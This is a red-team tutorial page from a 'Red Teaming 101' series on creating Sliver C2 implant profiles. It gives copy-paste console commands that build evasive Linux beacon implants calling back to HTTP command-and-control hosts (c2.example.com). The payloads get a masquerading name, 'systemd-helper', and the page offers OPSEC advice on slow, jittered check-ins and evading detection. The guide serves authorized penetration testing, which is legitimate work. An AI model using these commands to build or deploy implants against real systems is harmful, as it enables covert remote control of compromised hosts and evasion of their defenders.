1.2.1 Sliver Profile Creation OPSEC
1.2.1 Sliver Profile Creation β OPSEC Guide
BLUF: In Sliver, an implant profile is a saved build recipe. Use profiles to standardize low-noise beacon settings, prevent fat-fingered compile flags mid-op, and make repeat generation consistent across operators. Do not confuse implant profiles with the HTTP C2 profile selected by
--c2profile.
Sections
π Ready-to-Use Setup Β· 1. Implant Profile vs HTTP C2 Profile Β· 2. Naming & OPSEC Guardrails Β· 3. Create a Low-Noise Linux Beacon Profile Β· 4. Review Before You Build Β· 5. Generate from a Saved Profile Β· 6. Rotate or Remove Profiles Β· 7. Common Mistakes Β· 8. Quick-Reference Cheat Sheet
π Ready-to-Use Setup (Copy-Paste)
Replace these placeholders first:
PROFILE_NAMEβ saved Sliver implant profile nameC2_URLβ your HTTP(S) C2 endpoint, e.g.cdn-updates.example.com/assetsKILL_DATEβ engagement expiry in RFC3339 UTC, e.g.2026-12-31T23:59:59ZOUTDIRβ output directory, e.g./tmp/payloadsRun location: Every
profiles ...,generate ...,implants, and listener command in this page is run on the backend Sliver server (usually inside thesliver-serverconsole). Do not run these on the jump server. The jump server is only your redirector / front-end in the infra guides.
Step 1 β Create a Linux Beacon Profile (backend Sliver server)
# On the backend Sliver server, inside the sliver-server console:
profiles new beacon PROFILE_NAME \
--http C2_URL \
--os linux \
--arch amd64 \
--format exe \
--seconds 3600 \
--jitter 600 \
--reconnect 60 \
--poll-timeout 360 \
--max-errors 1000 \
--strategy s \
--evasion \
--skip-symbols \
--limit-datetime KILL_DATE \
--limit-fileexists /etc/ssh/sshd_config \
--c2profile default
Step 2 β Review the Saved Profile (backend Sliver server)
profiles
profiles info PROFILE_NAME
Step 3 β Generate a Payload from the Profile (backend Sliver server)
profiles generate PROFILE_NAME \
--name systemd-helper \
--save OUTDIR
Step 4 β Remove Stale or Burned Profiles (backend Sliver server)
profiles rm PROFILE_NAME
OPSEC: Treat implant profiles like operational templates. Keep names bland and role-based (
lin-prod-1,lin-ext-http,lin-shorthaul) rather than target-identifying (finance-prod-beacon).
MITRE ATT&CK Mapping
| Technique ID | Name | Tactic | Where Used |
|---|---|---|---|
| T1071.001 | Web Protocols | Command & Control | --http beacon transport |
| T1573.002 | Asymmetric Cryptography | Command & Control | Sliver transport crypto |
| T1027 | Obfuscated Files or Information | Defense Evasion | Compile-time evasion / symbol choices |
| T1480 | Execution Guardrails | Defense Evasion | Host/file/date execution restrictions reduce accidental execution |
Section 1 β Implant Profile vs HTTP C2 Profile
These are not the same thing:
| Term | What it is | Command / Flag |
|---|---|---|
| Implant profile | Saved compile recipe for a payload | profiles new ... |
| HTTP C2 profile | Traffic-shaping config used by HTTP(S) implants/listeners | --c2profile default |
Practical meaning:
profiles new beacon lin-prod ...saves your build flags server-side.--c2profile defaultselects which HTTP C2 traffic profile that implant uses.- You can have many implant profiles that all point at the same HTTP C2 profile.
OPSEC: Decide your HTTP C2 profile before building implants. Changing HTTP C2 behavior later can break compatibility with already-generated implants.
Section 2 β Naming & OPSEC Guardrails
Use profile names that help operators but do not expose target context:
Good:
lin-http-prod
lin-http-longsleep
lin-dns-fallback
lin-shared-stager
Bad:
finance-prod-beacon
hr-laptop-payload
acme-root-c2
Recommended defaults for a production Linux beacon profile:
--format exefor a normal Linux executable (Sliver emits an ELF)--seconds 3600 --jitter 600for low-and-slow check-ins--reconnect 60to avoid hanging forever on dead infra--poll-timeout 360to align with longer polling behavior--limit-datetimeto force a hard operational stop--limit-fileexistsor--limit-hostnameto reduce accidental execution
OPSEC: A saved profile reduces operator mistakes, but it also centralizes your defaults. Review old profiles regularly so outdated domains, kill dates, or C2 assumptions do not leak into new ops.
Section 3 β Create a Low-Noise Linux Beacon Profile
profiles new beacon lin-http-prod \
--http c2.example.com/assets \
--os linux \
--arch amd64 \
--format exe \
--seconds 3600 \
--jitter 600 \
--reconnect 60 \
--poll-timeout 360 \
--max-errors 1000 \
--strategy s \
--evasion \
--skip-symbols \
--limit-datetime 2026-12-31T23:59:59Z \
--limit-fileexists /etc/ssh/sshd_config \
--c2profile default
What matters here
| Flag | Why it matters |
|---|---|
--http c2.example.com/assets |
Current Sliver uses --http for HTTP(S) implants; URL prefixes help behind redirectors |
--format exe |
Linux executable format; the output is still an ELF |
--seconds 3600 --jitter 600 |
Jitter is seconds, not a percentage |
--evasion |
Enables evasion features such as user-space hook overwrite |
--skip-symbols |
Skips symbol obfuscation work; useful for builder speed, not network stealth |
--c2profile default |
Selects the HTTP C2 profile name |
OPSEC:
--skip-symbolsis often misunderstood. It is a build behavior choice, not a magic stealth flag. It does not make your beacon traffic blend in; your transport, timing, and redirector design do that.
Section 4 β Review Before You Build
Always inspect the profile after saving it:
profiles
profiles info lin-http-prod
Look for:
- Correct implant type β beacon, not session
- Correct C2 endpoint β no stale domain or old redirector
- Correct interval/jitter β seconds are what you intended
- Correct restrictions β hostname/file/date limits still make sense
- Correct C2 profile β
defaultor your chosen HTTP C2 profile
OPSEC:
profiles infois the last cheap chance to catch an expired kill date, wrong architecture, or noisy interval before you hand a payload to an operator.
Section 5 β Generate from a Saved Profile
# Build from the saved recipe:
profiles generate lin-http-prod \
--name systemd-helper \
--save /tmp/payloads
# Review generated builds:
implants
Why use profiles generate instead of retyping generate beacon ... every time?
- Fewer operator mistakes
- Easier peer review
- Consistent sleep/jitter/restrictions across a campaign
- Faster rotation when only the output name changes
OPSEC:
--nameis an operator-side build identifier, not a process masquerade guarantee on target. Do not assume it changes runtime process appearance in a meaningful defender-facing way.
Section 6 β Rotate or Remove Profiles
Profiles are cheap. Burned profiles should not hang around forever.
# Remove a stale profile:
profiles rm lin-http-prod
# Replace it with a new redirector / new kill date:
profiles new beacon lin-http-prod-v2 \
--http c2-2.example.com/assets \
--os linux --arch amd64 --format exe \
--seconds 3600 --jitter 600 \
--limit-datetime 2027-01-31T23:59:59Z
Rotate when:
- Domain or redirector changed
- Engagement scope changed
- Kill date expired
- You moved from direct server exposure to redirector infrastructure
Section 7 β Common Mistakes
| Mistake | Why it is wrong | Better move |
|---|---|---|
Using --https at generation time |
Current Sliver implant generation uses --http for HTTP(S) C2 |
Use --http; https is the listener command |
Using --format elf |
Sliverβs current format flag is exe for Linux executables |
Use --format exe |
| Treating jitter as a percentage | Sliver jitter is flat seconds | Plan exact intervals in seconds |
| Reusing target-specific profile names | Burns target context into server-side artifacts | Use generic operational names |
| No kill date | Payload can outlive scope | Always set --limit-datetime for real engagements |
Section 8 β Quick-Reference Cheat Sheet
# Create Linux beacon profile:
profiles new beacon lin-http-prod \
--http c2.example.com/assets \
--os linux --arch amd64 --format exe \
--seconds 3600 --jitter 600 \
--evasion --skip-symbols \
--limit-datetime 2026-12-31T23:59:59Z \
--c2profile default
# Inspect:
profiles
profiles info lin-http-prod
# Build from profile:
profiles generate lin-http-prod --name systemd-helper --save /tmp/payloads
# Remove old profile:
profiles rm lin-http-prod
Part of the Red Teaming 101 series. Parent: 1.2 Sliver C2 Linux Β· Next: 1.2.2 Sliver Beacon Creation OPSEC